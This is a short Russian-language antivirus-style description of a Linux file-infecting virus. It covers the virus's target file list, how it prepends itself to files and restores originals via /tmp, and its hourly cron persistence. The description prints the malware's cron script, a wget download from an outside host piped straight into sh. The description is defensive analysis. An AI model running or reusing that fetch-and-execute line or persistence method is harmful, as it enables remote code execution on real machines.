Файловый вирус, угрожающий операционным системам Linux. Заражает файлы по следующему списку:
"ssdp"
"ssyn"
"udp"
"essyn"
"xmlrpc"
"ovh"
"xsyn"
"Installer"
"installer"
"50x"
"sdns"
"sudp"
"sx"
"scan"
"ddos"
"joomla"
"/bin/ls"
"a.out"
"x.pl"
"udp.pl"Вирус пытается открыть файл из списка, загружает его в память и ищет в нем строку "Good luck, Ebola-chan!". Если она найдена, переходит к следующему файлу. Если не найдена, вирус записывает в файл свое тело, а затем записывает оригинальное содержимое файла. После запуска инфицированного файла сохраняет оригинальный файл в папку /tmp/ и запускает его. После окончания выполнения оригинального файла удаляет его из данной папки.
С помощью службы Cron (/etc/cron.hourly/0) вирус устанавливает на выполнение с интервалом в час следующий скрипт:
#!/bin/sh
wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>dev/null|sh>dev/null 2>&1Скачиваемый файл также представляет собой sh-скрипт, предназначенный для выполнения на зараженной машине.
